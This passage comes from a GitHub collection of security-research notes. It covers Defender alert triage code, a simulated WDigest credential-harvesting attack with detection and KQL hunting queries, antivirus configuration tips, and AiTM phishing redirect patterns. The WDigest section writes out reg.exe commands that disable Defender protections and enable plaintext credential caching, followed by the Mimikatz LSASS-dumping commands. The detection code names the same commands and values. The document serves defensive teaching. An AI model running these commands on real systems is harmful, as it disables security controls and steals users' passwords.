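    + b"aHR0cDovL2V4YW1wbGUuaW52YWxpZA=="               # constructed Base64 blob
    + b"\x00\x01\x02"
)

# Microsoft naming: Type:Platform/Family.Variant!Suffix (variant and suffix are optional)
NAME_RE = re.compile(
    r"^(?P<type>[^:]+):(?P<platform>[^/]+)/(?P<family>[^.!@]+)"
    r"(?:\.(?P<variant>[^!@]+))?(?P<suffix>[!@].*)?$"
)


def parse_detection_name(name: str) -> dict:
    """Split a Defender detection name into its naming-convention parts."""
    m = NAME_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Microsoft-style detection name: {name!r}")
    return m.groupdict()


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA256: the identifiers shown on the alert page and used to pivot."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def is_pe(data: bytes) -> bool:
    """DOS 'MZ' magic present and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_strings(data: bytes, min_len: int = 5) -> list:
    """Printable ASCII runs of at least min_len bytes (the 'Strings' view, done locally)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def decode_base64_strings(found: list) -> dict:
    """Map each string that is valid Base64 and decodes to printable text to its plaintext."""
    out = {}
    for s in found:
        if len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
            continue
        try:
            text = base64.b64decode(s, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            out[s] = text
    return out


def triage(data: bytes) -> dict:
    """One-shot static summary of a file, in the order the alert page presents it."""
    found = extract_strings(data)
    return {
        "hashes": file_hashes(data),
        "is_pe": is_pe(data),
        "dotnet_hint": "mscoree.dll" in found,   # consistent with an MSIL platform tag
        "strings": found,
        "decoded_base64": decode_base64_strings(found),
    }


if __name__ == "__main__":
    print(parse_detection_name("Trojan:MSIL/Mokes.B!MTB"))
    for key, value in triage(SAMPLE_BYTES).items():
        print(f"{key}: {value}")
```

Run it against a real sample by replacing `SAMPLE_BYTES` with the file's bytes; the hashes are what you paste into VirusTotal or MalwareBazaar, and a hit on `mscoree.dll` in the strings is the quick local confirmation of the MSIL platform tag before opening the file in a tool such as PE Studio.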
88 | 89 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/f9c891e7-bf82-4dc3-933d-fa18f0d6885d) 90 | 91 | In the realm of malware analysis, we can certainly utilize third-party tools to gain deeper insights into PE files. In the upcoming XDR blog, 92 | I plan to delve into further malware analysis of Type A, specifically focusing on ***deep analysis insights*** and ***PE file data using third-party tools*** such as PE Studio. 93 | 94 | #### Disclaimer 95 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 96 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day13-WDigest-credential-harvesting-attack.md: -------------------------------------------------------------------------------- 1 | # Day 13 - WDigest credential harvesting - attack 2 | Hi there !! Thank you for visiting [@SecurityResearch-Note](https://github.com/LearningKijo/SecurityResearcher-Note). 3 | Today, I'm diving into the WDigest credential harvesting attack, breaking it down into three parts. 4 | 1. WDigest credential harvesting - Attack technique 5 | 2. W Digest credential harvesting - Detection 6 | 3. WDigest credential harvesting - Threat Hunting 7 | 8 | #### Attack overview 9 | WDigest is a legacy authentication provider (HTTP Digest authentication) that still ships with Windows, and attackers abuse it to harvest passwords while evading security controls. 10 | When WDigest credential caching is on, LSASS keeps a plaintext copy of the password of every user who logs on afterwards so that it can answer Digest challenges, and that copy is exactly what credential-dumping tools read. Current Windows versions ship with the caching turned off (UseLogonCredential = 0), so an attacker who already has administrative rights on the host flips the registry value back to 1, waits for or forces new logons, and then dumps the clear-text passwords from LSASS memory. 
11 | 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/05b4876b-ebe3-48fc-8b59-398cffe0d928) 14 | > WDigest credential harvesting attack flow, [Threat Analytics](https://learn.microsoft.com/en-us/microsoft-365/security/defender/threat-analytics?view=o365-worldwide) in Microsoft 365 Defender 15 | 16 | ## Attack technique 17 | The simulated flow has three steps: turn off Microsoft Defender Antivirus features through their policy registry values, set the WDigest registry value so that LSASS starts caching plaintext credentials, and download Mimikatz. 18 | Mimikatz is then run with the "sekurlsa::wdigest" command to read the cached credentials out of LSASS memory. 19 | 20 | #### 1. Disable Microsoft Defender antivirus 21 | - [x] DisableRealtimeMonitoring = 1, turns off [Real-time protection] 22 | - [x] SpynetReporting = 0, turns off [Cloud-delivered protection] 23 | - [x] SubmitSamplesConsent = 2, sets [Automatic sample submission] to "never send" 24 | 25 | ```powershell 26 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f 27 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d 0 /f 28 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f 29 | ``` 30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/28105886-3f1d-4cea-8de8-c7048a60bd9a) 32 | 33 | > [!Important] 34 | > These commands turn off Microsoft Defender Antivirus features by writing policy values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender. To prevent and detect this technique, enabling [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide) is the most effective approach, as it safeguards against disabling antivirus through registry and command-line changes like these. 35 | 36 | #### 2. 
Enable WDigest 37 | [MITRE | ATT&CK, Modify Registry, T1112, Wdigest](https://attack.mitre.org/techniques/T1112/) 38 | 39 | ```powershell 40 | reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f 41 | ``` 42 | 43 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49e3a65c-fe1c-42da-9ac6-902fa5f1f51b) 44 | 45 | > [!Important] 46 | > Even if the antivirus didn't detect and prevent the WDigest configuration change, Microsoft Defender for Endpoint, as the EDR layer, can detect these activities and provide alerts. 47 | 48 | #### 3. Download & Execute Mimikatz tool 49 | Download - [GitHub - ParrotSec/mimikatz](https://github.com/ParrotSec/mimikatz) 50 | 51 | ```mimikatz 52 | mimikatz # privilege::debug 53 | mimikatz # sekurlsa::wdigest 54 | ``` 55 | "privilege::debug" acquires SeDebugPrivilege so that Mimikatz can open the LSASS process; "sekurlsa::wdigest" then reads the WDigest credential cache, which only holds plaintext passwords for logons that happened after UseLogonCredential was set to 1, so sessions established before the change show no password until the user authenticates again. 56 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/9ef03db8-22a6-45fc-a8ca-5ac7dd4bb298) 57 | 58 | > [!Important] 59 | > In terms of endpoint protection, Microsoft Defender Antivirus and Microsoft Defender for Endpoint are the most effective solutions for preventing and detecting Mimikatz activities. 60 | > Additionally, when it comes to addressing lateral movement and enhancing identity visibility, Microsoft Defender for Identity is a valuable product for detecting such activities. 61 | 62 | ## Detection 63 | After simulating a WDigest credential harvesting attack, let's examine how this attack is mapped into a single incident in the Microsoft 365 Defender portal. 64 | 65 | All the attack techniques, from disabling antivirus to executing Mimikatz, were detected by Microsoft Defender for Endpoint, generating 11 alerts. Additionally, Threat Analytics provides insights related to Mimikatz and WDigest credential harvesting.
66 | 67 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1c9c3f9d-4ff2-4269-b67f-f6d6a67f72b3) 68 | 69 | In the incident page, you might see a number of alerts, related assets, MITRE techniques, and more. 70 | At the same time, I'd like to highlight some alerts from the simulation as shown below. 71 | 72 | #### ***Alert : Microsoft Defender Antivirus protection turned off*** 73 | A protection feature in Microsoft Defender Antivirus has been turned off. An attacker might be trying to evade detection. 74 | 75 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/dde8b17c-38bc-4847-87fc-d8940ebc8313) 76 | 77 | #### ***Alert : WDigest configuration change*** 78 | An attempt to turn on the WDigest authentication provider through the registry was observed. 79 | If the attempt is successful, WDigest will load on the next restart and begin to store credentials as plaintext in LSASS process memory. An attacker might be attempting to collect those credentials. 80 | 81 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8065422f-a296-46a3-82a0-71a0997108db) 82 | 83 | #### ***Alert : Malicious credential theft tool execution detected*** 84 | A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. 85 | > [!Note] 86 | > The two mimikatz commands (mimikatz # privilege::debug, mimikatz # sekurlsa::wdigest) which I simulated on the device were detected by Microsoft Defender for Endpoint. Also, an alert - 'Mimikatz credential theft tool' was triggered when downloading Mimikatz on the device. 
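The alerts above correspond to registry and process events that are also visible in advanced hunting. As an added example that is not part of the original post, the Python below re-implements that detection logic offline over constructed events shaped like DeviceRegistryEvents and DeviceProcessEvents rows (a subset of columns; the device names, timestamps and command lines are made up and are not telemetry from the simulation), and then correlates the three stages per device so that the full chain (Defender policy tampering, UseLogonCredential set to 1, Mimikatz sekurlsa usage) can be told apart from a single noisy hit.

```python
import re

# Constructed events shaped like the advanced-hunting tables (subset of columns).
# Not real telemetry: device names, timestamps and command lines are made up.
DEFENDER_POLICY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

REGISTRY_EVENTS = [
    {"Timestamp": "2023-11-20T10:01:00Z", "DeviceName": "ws01", "RegistryKey": DEFENDER_POLICY,
     "RegistryValueName": "DisableRealtimeMonitoring", "RegistryValueData": "1"},
    {"Timestamp": "2023-11-20T10:01:01Z", "DeviceName": "ws01", "RegistryKey": DEFENDER_POLICY + r"\Spynet",
     "RegistryValueName": "SpynetReporting", "RegistryValueData": "0"},
    {"Timestamp": "2023-11-20T10:01:02Z", "DeviceName": "ws01", "RegistryKey": DEFENDER_POLICY + r"\Spynet",
     "RegistryValueName": "SubmitSamplesConsent", "RegistryValueData": "2"},   # 2 = never send
    {"Timestamp": "2023-11-20T10:02:00Z", "DeviceName": "ws01", "RegistryKey": WDIGEST_KEY,
     "RegistryValueName": "UseLogonCredential", "RegistryValueData": "1"},
    # benign: a policy explicitly keeping real-time protection on, on another device
    {"Timestamp": "2023-11-20T10:03:00Z", "DeviceName": "ws02", "RegistryKey": DEFENDER_POLICY,
     "RegistryValueName": "DisableRealtimeMonitoring", "RegistryValueData": "0"},
]

PROCESS_EVENTS = [
    {"Timestamp": "2023-11-20T10:02:00Z", "DeviceName": "ws01", "FileName": "reg.exe",
     "ProcessCommandLine": f'reg.exe add "{WDIGEST_KEY}" /v UseLogonCredential /t REG_DWORD /d 1 /f'},
    {"Timestamp": "2023-11-20T10:05:00Z", "DeviceName": "ws01", "FileName": "mimikatz.exe",
     "ProcessCommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::wdigest" exit'},
    {"Timestamp": "2023-11-20T10:06:00Z", "DeviceName": "ws02", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoProfile -Command Get-Process"},
]

# Value/data pairs from step 1 of the attack section. SubmitSamplesConsent: 0 = always prompt,
# 1 = send safe samples, 2 = never send, 3 = send all samples; only 2 is flagged here.
DEFENDER_TAMPER = {"DisableRealtimeMonitoring": {"1"}, "SpynetReporting": {"0"}, "SubmitSamplesConsent": {"2"}}
# Module names from the page's Mimikatz query; tune for your environment ("crypto" in particular is noisy).
MIMIKATZ_MODULES = ("sekurlsa", "kerberos", "crypto", "vault", "lsadump")
TOOL_HOSTS = {"mimikatz.exe", "powershell.exe", "powershell_ise.exe"}
ENABLE_WDIGEST_RE = re.compile(r"/d\s+(?:0x)?0*1\b")   # 'reg add ... /d 1' in any spelling of 1


def check_registry_event(ev: dict) -> list:
    """Findings for one DeviceRegistryEvents-style row (empty list = nothing suspicious)."""
    key = ev["RegistryKey"].lower()
    name, data = ev["RegistryValueName"], ev["RegistryValueData"]
    findings = []
    if DEFENDER_POLICY.lower() in key and data in DEFENDER_TAMPER.get(name, set()):
        findings.append(f"defender-policy-tamper:{name}={data}")
    if "wdigest" in key and name == "UseLogonCredential" and data == "1":
        findings.append("wdigest-uselogoncredential-enabled")
    return findings


def check_process_event(ev: dict) -> list:
    """Findings for one DeviceProcessEvents-style row."""
    low = ev["ProcessCommandLine"].lower()
    findings = []
    if "wdigest" in low and "uselogoncredential" in low and ENABLE_WDIGEST_RE.search(low):
        findings.append("wdigest-enable-commandline")
    if ev["FileName"].lower() in TOOL_HOSTS and any(mod in low for mod in MIMIKATZ_MODULES):
        findings.append("credential-theft-tool-commandline")
    return findings


def hunt(registry_events: list, process_events: list) -> dict:
    """Group (timestamp, finding) pairs per device, oldest first."""
    per_device = {}
    for ev in registry_events:
        for f in check_registry_event(ev):
            per_device.setdefault(ev["DeviceName"], []).append((ev["Timestamp"], f))
    for ev in process_events:
        for f in check_process_event(ev):
            per_device.setdefault(ev["DeviceName"], []).append((ev["Timestamp"], f))
    for findings in per_device.values():
        findings.sort()
    return per_device


def chain_detected(findings: list) -> bool:
    """True when all three stages of the simulated attack appear on the same device."""
    tags = {f for _, f in findings}
    return (any(t.startswith("defender-policy-tamper") for t in tags)
            and any(t.startswith("wdigest-") for t in tags)
            and "credential-theft-tool-commandline" in tags)


if __name__ == "__main__":
    for device, findings in hunt(REGISTRY_EVENTS, PROCESS_EVENTS).items():
        print(device, "CHAIN" if chain_detected(findings) else "partial", findings)
```

The per-device correlation is the part the individual queries in the Threat Hunting section do not give you: a lone DisableRealtimeMonitoring change on ws02 stays a single finding, while ws01, where all three stages occur within minutes, is reported as the complete chain.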
87 | 88 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d4325269-853e-4488-837d-2a56e77b0928) 89 | 90 | 91 | ## Threat Hunting 92 | For threat hunting purposes, here are some KQL queries to track activities like disabling antivirus, changing WDigest configurations, and executing the Mimikatz tool. 93 | 94 | #### Defender Antivirus configuration 95 | This query will hunt for registry key activities related to Microsoft Defender Antivirus. Because it returns every change under the policy key, narrow it with RegistryValueName and RegistryValueData (for example DisableRealtimeMonitoring set to 1) when you want only the changes used in this attack. 96 | 97 | ```kql 98 | DeviceRegistryEvents 99 | | where Timestamp > ago(30d) 100 | | where RegistryKey has @"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" 101 | | project-reorder Timestamp, DeviceId, DeviceName, ActionType, RegistryKey, RegistryValueType, RegistryValueName, RegistryValueData 102 | | sort by Timestamp desc 103 | ``` 104 | 105 | #### WDigest configuration change 106 | This query helps identify attempts to enable WDigest credential caching through the registry, either from the registry event itself or from the command line that wrote it. 107 | 108 | ```kql 109 | union DeviceRegistryEvents, DeviceProcessEvents 110 | // Find attempts to turn on WDigest credential caching 111 | | where RegistryKey contains "wdigest" and RegistryValueName == "UseLogonCredential" and RegistryValueData == "1" or 112 | // Find processes created with commandlines that attempt to turn on WDigest caching 113 | ProcessCommandLine has "WDigest" and ProcessCommandLine has "UseLogonCredential" and ProcessCommandLine has "dword" and ProcessCommandLine has "1" 114 | | project Timestamp, DeviceName, PreviousRegistryValueData, 115 | RegistryKey, RegistryValueName, RegistryValueData, FileName, ProcessCommandLine, 116 | InitiatingProcessAccountName, InitiatingProcessFileName, 117 | InitiatingProcessCommandLine, InitiatingProcessParentFileName 118 | ``` 119 | > **Source** : WDigest credential harvesting, Threat Analytics in Microsoft 365 Defender 120 | 121 | #### Mimikatz CommandLine 122 | This query helps display all unique Mimikatz command-line activities for each device.
123 | 124 | ```kql 125 | DeviceProcessEvents 126 | | where Timestamp > ago(30d) 127 | | where FileName in~ ("powershell.exe","powershell_ise.exe", "mimikatz.exe") 128 | | where ProcessCommandLine has_any ("sekurlsa","kerberos","crypto", "vault", "lsadump") or InitiatingProcessCommandLine has_any ("sekurlsa","kerberos","crypto", "vault", "lsadump") 129 | | summarize make_set(ProcessCommandLine) by DeviceId, DeviceName 130 | ``` 131 | 132 | ## Reference 133 | 1. [Forcing WDigest to Store Credentials in Plaintext](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext) 134 | 2. "WDigest credential harvesting", from [Threat Analytics](https://learn.microsoft.com/en-us/microsoft-365/security/defender/threat-analytics?view=o365-worldwide) in Microsoft 365 Defender 135 | 136 | #### Disclaimer 137 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 138 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day05-AntivirusConfig-Tips.md: -------------------------------------------------------------------------------- 1 | # Day5 - Microsoft Defender Antivirus - Recommendations & Tips 2 | Firstly, Microsoft Defender Antivirus is not just EPP which is designed to only prevent known threats. It includes various feature engines to detect and protect against threats in both **pre-execution and post-execution stages**. 3 | In this blog, I would like to share recommended configurations and tips for Microsoft Defender Antivirus. I hope that these insights will be helpful for configuring the antivirus in the future. 
4 | 5 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/da052b9d-cf65-47da-9727-eff144aff868) 6 | > Defender Antivirus engines - [In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks](https://www.microsoft.com/en-us/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/) 7 | 8 | ## Recommendations & Tips (consideration) 9 | Regarding Microsoft Defender Antivirus(MDAV) configuration, there is **no one-size-fits-all recommendation** due to the evolving nature of cyber attacks. 10 | However, there are certain features that ***you should enable and consider when deploying MDAV solution.*** 11 | 12 | This is the great example story I received from a senior colleague whom I deeply respect. When the air conditioner is turned on, everyone has a different comfort level in terms of temperature. This means that the preferred temperature can vary among individuals, ranging from 18°C to 28°C, or even higher. Therefore, in the context of antivirus configuration, while there are certain features that are generally recommended to enable for MDAV, the specific settings, such as scan time, day, update frequency, and others, can vary depending on the organization's needs and business requirements. 13 | 14 | #### Recommendations 15 | | # | Configuration Name | Comment | 16 | | :-- | :-- | :-- | 17 | | 1 | Real-time protection | Recommend turning on real-time protection. | 18 | | 2 | Cloud protection | Recommend turning on cloud protection.
- [Block at First Sight(BAFS)](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide) | 19 | | 3 | Sample submission | Recommend turning on submit samples consent.
Since it's a prerequisite for using BAFS, you need to select one of the options below:
- ***Send safe samples automatically (default)***
- Always Prompt
- Send all samples automatically| 20 | | 4 | PUA Protection | Recommend turning on PUA Protection. 21 | | 5 | Tamper Protection | Highly recommend turning on Tamper Protection and here are some blogs that discuss this feature.
- [Make sure Tamper Protection is turned on](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/make-sure-tamper-protection-is-turned-on/ba-p/2695568)
- [Hunting down LemonDuck and LemonCat attacks](https://www.microsoft.com/en-us/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/) | 22 | 23 | #### Tips (consideration) 24 | | # | Configuration Name | Comment | 25 | | :-- | :-- | :-- | 26 | | 6 | Scan type | In most cases, **a quick scan** is sufficient and is the recommended option for scheduled scans.
- [Schedule regular quick and full scans with Microsoft Defender Antivirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/schedule-antivirus-scans?view=o365-worldwide)| 27 | | 7 | Antivirus protection updates |Keeping your antivirus protection up to date is critical - Fallback order.
- [Manage the sources for Microsoft Defender Antivirus protection updates](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus?view=o365-worldwide)
- [Microsoft Defender Antivirus updates - Previous versions for technical upgrade support](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support?view=o365-worldwide) | 28 | | 8 | Antivirus network connections | To ensure Microsoft Defender Antivirus cloud-delivered protection works properly, your security team must configure your network to allow connections between your endpoints and certain Microsoft servers.
- [Configure and validate Microsoft Defender Antivirus network connections](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus?view=o365-worldwide) | 29 | 30 | #### Antivirus misconfiguration and vulnerable configuration 31 | By filtering on antivirus in Microsoft Defender Vulnerability Management (MDE), you can identify any antivirus misconfigurations and vulnerable configurations in your tenant. 32 | Using KQL in Advanced Hunting, you can also list these configuration checks with the following query. Note that DeviceTvmSecureConfigurationAssessmentKB describes the checks themselves; to see which devices fail them, join it on ConfigurationId with the DeviceTvmSecureConfigurationAssessment table and filter for IsCompliant == 0. 33 | 34 | ```kql 35 | DeviceTvmSecureConfigurationAssessmentKB 36 | | where ConfigurationSubcategory == "Antivirus" 37 | ``` 38 | 39 | - [What is Microsoft Defender Vulnerability Management](https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide) 40 | - [DeviceTvmSecureConfigurationAssessmentKB table in the advanced hunting schema](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-devicetvmsecureconfigurationassessmentkb-table?view=o365-worldwide) 41 | 42 | 43 | ## Note 44 | #### Cloud block timeout period 45 | According to [Microsoft docs](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus?view=o365-worldwide), when Microsoft Defender Antivirus finds a suspicious file, it can prevent the file from running while it queries the Microsoft Defender Antivirus cloud service. The default period that the file is blocked is 10 seconds, and it can be extended by up to 50 additional seconds, for a maximum of 60 seconds. A longer period gives the cloud more time to reach a verdict on a genuinely unknown file, but every file that triggers the query is held for up to that long, so raising the value is felt as slow starts or apparent hangs in legitimate programs. 
Therefore, generally speaking, ***a 10-second timeout is recommended***, and the value should only be raised where the extra cloud analysis time is actually needed. 46 | 47 | #### CPU performance 48 | If you have any concerns about CPU performance, please check the following parameters: 49 | 50 | 1. ***CPU usage limit per scan (CSP: AvgCPULoadFactor)***
51 | This policy setting allows you to configure the maximum percentage CPU utilization permitted during a scan. The default value is 50. 52 | 2. ***Use low CPU priority for scheduled scans (CSP: EnableLowCPUPriority)***
53 | This policy setting allows you to enable or disable low CPU priority for scheduled scans. 54 | 55 | #### Exclusions 56 | If you have any concerns regarding Windows Server or misconfigurations related to exclusions, these documents can be helpful. In particular, they provide well-written guidance on paths, extensions, and processes that are ***Not recommended to be excluded due to the potential for attacks.*** 57 | 1. [Configure Microsoft Defender Antivirus exclusions on Windows Server](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus?view=o365-worldwide) 58 | 2. [Common mistakes to avoid when defining exclusions](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus?view=o365-worldwide) 59 | 60 | 61 | 62 | ## Reference 63 | 1. [Defender Policy CSP - Windows Client Management](https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-defender?WT.mc_id=Portal-fx) 64 | 2. [Windows Antivirus policy settings for Microsoft Defender Antivirus for Intune](https://learn.microsoft.com/en-us/mem/intune/protect/antivirus-microsoft-defender-settings-windows) 65 | 3. [MDE Antivirus Configuration Common Mistakes and Best Practice](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/mde-antivirus-configuration-common-mistakes-and-best-practice/ba-p/2127405) 66 | 4. [In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks](https://www.microsoft.com/en-us/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/) 67 | 5. 
[Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection](https://www.microsoft.com/en-us/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/) 68 | 6. [How artificial intelligence stopped an Emotet outbreak](https://www.microsoft.com/en-us/security/blog/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/) 69 | 7. [Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV](https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) 70 | 71 | #### Disclaimer 72 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 73 | 74 | 75 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day07-AiTM-Insights-XDR.md: -------------------------------------------------------------------------------- 1 | # Day 7 - AiTM attack insights 2 | 3 | AiTM attack refers to ***"Adversary-in-The-Middle"*** phishing technique where attackers intercept communication between a user and a legitimate website, stealing passwords and session cookies to gain unauthorized access and perform fraudulent activities. 4 | 5 | 6 | ## AiTM - "From cookie theft to BEC" 7 | As part of the "From cookie theft to BEC" attack, the attacker initiates the process by sending phishing emails to the target. Upon clicking a link in the email, the user is directed to a fake website. At this point, the attackers establish a proxy server between the target user and the intended website. This setup allows the attacker to intercept and capture the user's password and session cookie, providing them with the means to authenticate and access the user's session on the website. 
After successfully authenticating, for example, to Outlook, they can read email content or create a forwarding rule to identify the target of the fraud. Once they have identified the target, they take action to initiate multiple fraud attempts. 8 | 9 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/10b9b7d8-f1bf-4c73-9259-7d1455c07a0d) 10 | 11 | > Figure 1. AiTM attack kill chain, [MS security blog, July 12, 2022](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 12 | 13 | 14 | ### Open-source AiTM phishing toolkits 15 | As there are tools available on the internet, attackers utilize them for conducting AiTM attacks. 16 | - [Evilginx2](https://github.com/kgretzky/evilginx2) 17 | - [Modlishka](https://github.com/drk1wi/Modlishka) 18 | - [Muraena](https://github.com/muraenateam/muraena) 19 | 20 | ### Phishing mail pattern 21 | At this time, based on third-party research, attackers are targeting enterprise users of Gmail or Outlook with emails related to password reset, password expiry, voice message logs, and accessing office-related and other content. 22 | 23 | ### Initial access - phishing email 24 | As the attacker aims to lure the target to a phishing site while avoiding detection by mail security, they primarily rely on three attack techniques, as follows. 25 | - Type Ⅰ : HTML file attachment 26 | - Type Ⅱ : Phishing link 27 | - Type Ⅲ : [Open Redirect](https://cwe.mitre.org/data/definitions/601.html) 28 | 29 | For Type Ⅰ, third-party research has observed that the HTML attachment commonly uses ***window.location.replace()*** to send the user on to the phishing site as soon as the attachment is opened. 
30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/2b255140-c15e-4027-9ff5-230c2bf3a56e) 32 | > HTML attachment with URL redirection | [Zscaler, AiTM report](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) 33 | 34 | e.g. 35 | | Language | Code | 36 | |:---------|:-----| 37 | | JavaScript | `window.location.replace("hxxps://example.com")` | 38 | | JavaScript | `window.location.href = "hxxps://example.com"` | 39 | | HTML | `<meta http-equiv="refresh" content="0; url=hxxps://example.com">` | 40 | | PHP | `<?php header("Location: hxxps://example.com"); ?>` | 41 | > [!Note] 42 | > 43 | > **JavaScript** : "replace()" is used for one-time, immediate page replacement without adding a history entry, while setting the "href" property navigates to the new URL while preserving the ability to go back using the browser's history. 44 | > 45 | > **PHP** : JavaScript handles client-side redirection within the browser, while PHP manages server-side redirection on the server before the response is sent to the client's browser (header() must be called before any other output is written). 46 |
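The following is an added example and not code from the original note or from any of the reports it cites. It is a small static analyser for a lure HTML attachment of the kind shown above: it finds the client-side redirect idioms from the table (window.location.replace / window.location.href and meta refresh) and, when the destination carries a Base64 fragment in the `[username].[wildcard domain].[tld]/#<base64 email>` format described in the Base64 section further down, decodes the victim address. The attachment text, domains and addresses are constructed for illustration and are not real indicators.

```python
# Added example (not from the original note): static triage of a lure HTML
# attachment. Sample data is constructed; the redirector domains are not IOCs.
import base64
import binascii
import re
from urllib.parse import urlsplit

# One regex per redirect idiom from the table above; each captures the destination URL.
REDIRECT_PATTERNS = [
    ("window.location.replace",
     re.compile(r"""window\.location\.replace\(\s*['"]([^'"]+)['"]\s*\)""", re.I)),
    ("window.location.href",
     re.compile(r"""window\.location\.href\s*=\s*['"]([^'"]+)['"]""", re.I)),
    ("meta refresh",
     re.compile(r"""<meta[^>]+http-equiv=['"]?refresh['"]?[^>]*url=([^'">\s]+)""", re.I)),
]
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def refang(url):
    """Turn defanged notation (hxxp, [.]) back into a parseable URL."""
    return (url.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


def decode_fragment_email(url):
    """Return the e-mail hidden in the URL fragment, or None if the fragment is not one."""
    fragment = urlsplit(refang(url)).fragment
    if not fragment:
        return None
    # btoa() output is padded, but copied URLs often lose the trailing '='; restore it.
    padded = fragment + "=" * (-len(fragment) % 4)
    # Try the standard alphabet first, then the URL-safe alphabet.
    for candidate in (padded, padded.replace("-", "+").replace("_", "/")):
        try:
            text = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if EMAIL_RE.match(text):
            return text.lower()
    return None


def find_redirects(html):
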